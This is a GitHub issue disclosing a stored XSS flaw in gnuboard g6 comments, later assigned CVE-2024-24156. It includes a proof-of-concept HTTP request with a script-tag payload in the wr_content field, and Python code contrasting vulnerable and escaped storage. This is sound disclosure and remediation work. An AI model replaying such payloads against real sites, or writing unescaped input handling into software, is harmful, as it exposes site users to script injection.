
Stored XSS vulnerability due to HTML Escape unprocessed when writing comments #316

Closed
mirusu400 opened this issue Jan 18, 2024 · 1 comment
mirusu400 (Contributor) commented Jan 18, 2024

Hello.

Currently, there is a vulnerability when writing Gnuboard g6 comments that allows the <script> tag to be written.

[Name of affected Product]

gnuboard 6

[Affected version]

58c737a

[Vulnerability Type]

  • Stored XSS

[Root Cause]

  • While writing a reply on a post, the wr_content parameter is not sanitized for HTML tags, so posting a reply with an HTML tag causes a Stored XSS attack.

[Attack Vectors]

_2024_01_17_19_33_11_286.mp4

As shown above, entering HTML tags is normally prohibited within a web browser, but if you manipulate HTTP requests using proxy tools such as Burp Suite, or send web requests directly using the requests library to create comments, the HTML tags are reflected as they are.

This enables Stored XSS attacks by injecting the tag <script>.

Below is a PoC web request.

POST /board/write_comment_update/free HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 120
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/free/9
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogImNhYjNmNTJlMWJiMGM4MTI5YjJkZWFhOThjNzU1NzNiIiwgInNzX3dyaXRlX3RpbWUiOiAiMjAyNC0wMS0xNyAxNzoyOToxMyIsICJzc19tYl9pZCI6ICJhZG1pbiIsICJzc19tYl9rZXkiOiAiYjQ1NDlkNDUyY2I5OGE4ZTQ0NjgxMjRlMDljN2U2ZDIifQ==.Zahxzw.f63f-VyyFl0nkkcr7ZReYkGnMm4
Connection: close

w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page=&token=cab3f52e1bb0c8129b2deaa98c75573b&wr_content=<script>alert(1)</script>
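To make the root cause and the fix concrete, here is an added Python example (not gnuboard g6's own code, and not the fix commit). It takes the form body of the PoC request quoted above, shows the "before" behaviour the report describes (wr_content stored exactly as received) next to a hardened variant that HTML-escapes wr_content on the server, and includes a small check that stored comment text contains no raw markup. The handler function names and the idea of storing the escaped string are assumptions for illustration; only the form body and field names come from the report.

```python
import html
from urllib.parse import parse_qs

# Constructed sample: the form body of the PoC request quoted in this issue
# (the token value is the one shown in the report, not a live credential).
POC_BODY = (
    "w=c&bo_table=free&wr_id=9&comment_id=&sca=&sfl=&stx=&spt=&page="
    "&token=cab3f52e1bb0c8129b2deaa98c75573b"
    "&wr_content=<script>alert(1)</script>"
)


def parse_form_body(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded body into single-valued fields.

    Blank values are kept so fields such as comment_id= still appear.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def store_comment_vulnerable(form: dict) -> str:
    """The 'before' behaviour described in the report (hypothetical stand-in,
    not gnuboard's code): wr_content is taken from the request and stored as-is.
    The browser-side restriction on typing tags does nothing here, because the
    request never went through that form."""
    return form.get("wr_content", "")


def store_comment_escaped(form: dict) -> str:
    """Hardened variant: HTML-escape wr_content on the server before storing it,
    so '<', '>', '&' and quotes cannot form markup when the comment is rendered."""
    return html.escape(form.get("wr_content", ""), quote=True)


def has_unescaped_markup(stored: str) -> bool:
    """Simple check a reviewer or test can run on stored comment text:
    escaped content never contains a raw '<' or '>'."""
    return "<" in stored or ">" in stored


if __name__ == "__main__":
    form = parse_form_body(POC_BODY)
    print("vulnerable:", store_comment_vulnerable(form))
    print("escaped:   ", store_comment_escaped(form))
```

The fix commit title ("HTML Escaping when writing comments") indicates escaping at write time, which is what the hardened function models; the equally common alternative is to store the raw text and escape in the template at render time. Either way the control has to live on the server, since the PoC bypasses the browser form entirely. If a product wants to allow a subset of HTML in comments, blanket escaping is the wrong tool and an allowlist-based sanitizer is needed instead.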
mirusu400 added a commit to mirusu400/g6 that referenced this issue Jan 21, 2024
KimTom89 added a commit that referenced this issue Jan 23, 2024
fix: HTML escaping when writing comments (#316)
@KimTom89 KimTom89 self-assigned this Jan 23, 2024
@mirusu400 mirusu400 changed the title from "Stored XSS vulnerability due to missing HTML escaping when writing comments" (originally in Korean) to "Stored XSS vulnerability due to HTML Escape unprocessed when writing comments" Feb 21, 2024
mirusu400 (Contributor, Author) commented

This vulnerability has been assigned CVE-2024-24156
